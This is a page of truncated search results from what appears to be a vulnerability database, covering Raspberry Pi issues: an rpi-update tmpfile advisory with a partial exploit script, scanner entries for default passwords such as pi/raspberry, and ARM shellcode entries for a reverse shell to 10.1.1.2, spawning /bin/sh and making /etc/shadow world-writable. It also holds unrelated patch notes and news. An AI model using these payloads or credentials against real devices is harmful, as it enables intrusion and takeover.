816 matches found
rpi-update tmpfile vulnerability
Raspberry Pi Firmware Updater Vulnerability Application: https://github.com/Hexxeh/rpi-update/ Version Tested: Github source as of 10ad1e975a 10th Feb commit Vulnerability 1: A malicious user can clobber any file due to insecure tmp file handling. Example: Any unprivileged user can create the...
Re: rpi-update tmpfile vulnerability
Hello everyone, I took a closer look at this vulnerability here is my exploit to share: 45 cat /tmp/updateScript.sh EOF -- if we own it first, wait for IMODIFY and inject our malicious code 46 !/bin/bash 47 if mv "$tempFileName" "$0"; then 48 rm -- "$0" 49 exec env UPDATESELF=0 /bin/bash "$0"...
Raspberry Pi Firmware Updater File Clobber
Raspberry Pi Firmware Updater Vulnerability Application: https://github.com/Hexxeh/rpi-update/ Version Tested: Github source as of 10ad1e975a 10th Feb commit Vulnerability 1: A malicious user can clobber any file due to insecure tmp file handling. Example: Any unprivileged user can create the...
rpi-update - Insecure Temporary File Handling / Security Bypass
// source: https://www.securityfocus.com/bid/58292/info rpi-update is prone to an insecure temporary file-handling vulnerability and a security-bypass vulnerability An attacker can exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected...
rpi-update - Insecure Temporary File Handling Security Bypass
rpi-update - Insecure Temporary File Handling Security Bypass // source: https://www.securityfocus.com/bid/58292/info rpi-update is prone to an insecure temporary file-handling vulnerability and a security-bypass vulnerability An attacker can exploit this issue to perform symbolic-link attacks,...
Default Password (openelec) for 'root' Account
The account 'root' on the remote host has the password 'openelec'. An attacker can exploit this issue to gain full access to the affected system. Note that a version of Linux optimized for Raspberry Pi ARM computers is known to use these credentials by default. %NASLMINLEVEL 70300 C Tenable Netwo...
Default Password (raspberry) for 'pi' Account
The account 'pi' on the remote host has the password 'raspberry'. An attacker may leverage this issue to gain full access to the affected system. Note that a version of Linux optimized for Raspberry Pi ARM computers is known to use these credentials by default. %NASLMINLEVEL 70300 C Tenable Netwo...
Default Password (raspi) for 'root' Account
The account 'root' on the remote host has the password 'raspi'. An attacker may leverage this issue to gain full access to the affected system. Note that a version of Linux optimized for Raspberry Pi ARM computers is known to use these credentials by default. %NASLMINLEVEL 70300 C Tenable Network...
SuSE 11.2 Security Update : pcp (SAT Patch Number 7221)
pcp was updated to version 3.6.10 which fixes security issues and also brings a lot of new features. - Update to pcp-3.6.10. - Transition daemons to run under an unprivileged account. - Fixes for security advisory CVE-2012-5530: tmpfile flaws;. bnc782967 - Fix pcp1 command short-form pmlogger...
SuSE 10 Security Update : pcp (ZYPP Patch Number 8421)
pcp was updated to version 3.6.10 which fixes security issues and also brings a lot of new features. - Update to pcp-3.6.10. o Transition daemons to run under an unprivileged account. o Fixes for security advisory CVE-2012-5530: tmpfile flaws; bnc782967. o Fix pcp1 command short-form pmlogger...
[PwnPi v2.0] A Pen Test Drop Box distro for the Raspberry Pi
PwnPi is a Linux-based penetration testing dropbox distribution for the Raspberry Pi. It currently has 114 network security tools pre-installed to aid the penetration tester. It is built on the debian squeeze image from the raspberry pi foundation’s website and uses Xfce as the window manager Log...
Raspberry Pi Linux/ARM - chmod"/etc/shadow", 0777 41 bytes
Raspberry Pi Linux/ARM - chmod"/etc/shadow", 0777 41 bytes. Shellcode exploit for arm platform / Title: Linux/ARM - chmod"/etc/shadow", 0777 - 41 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l Author: midnitesnake 00008054 : 8054: e28f6001 add r6, pc, 1 8058: e12fff16 bx r6 805c: 4678 mov r0,...
Raspberry Pi Linux/ARM - execve"/bin/sh", 0, 0 vars 30 bytes
Raspberry Pi Linux/ARM - execve"/bin/sh", 0, 0 vars 30 bytes. Shellcode exploit for arm platform / Title: Linux/ARM - execve"/bin/sh", 0, 0 vars - 30 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l Author: midnitesnake 00008054 : 8054: e28f6001 add r6, pc, 1 8058: e12fff16 bx r6 805c: 4678 mov...
Raspberry Pi Linux/ARM - reverse_shelltcp,10.1.1.2,0x1337
Raspberry Pi Linux/ARM - reverseshelltcp,10.1.1.2,0x1337. Shellcode exploit for arm platform / Title: Linux/ARM - reverseshelltcp,10.1.1.2,0x1337 execve"/bin/sh", 0, 0 vars - 72 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l - Raspberry Pi Author: midnitesnake 00008054 : 8054: e28f1001 add r1...
linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337) execve("/bin/sh", [0], [0 vars]) - 72 bytes
/ Title: Linux/ARM - reverseshelltcp,10.1.1.2,0x1337 execve"/bin/sh", 0, 0 vars - 72 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l - Raspberry Pi Author: midnitesnake 00008054 : 8054: e28f1001 add r1, pc, 1 8058: e12fff11 bx r1 805c: 2002 movs r0, 2 805e: 2101 movs r1, 1 8060: 1a92 subs r2,...
The Pirate Bay plans Low Orbit Server Drones to beat #Censorship
The Pirate Bay plans Low Orbit Server Drones to beat Censorship One of the world's largest BitTorrent sites "The Pirate Bay" is going to put servers on GPS-controlled aircraft drones in order to evade authorities who are looking to shut the site down. In a Sunday blog post, The Pirate Bay announc...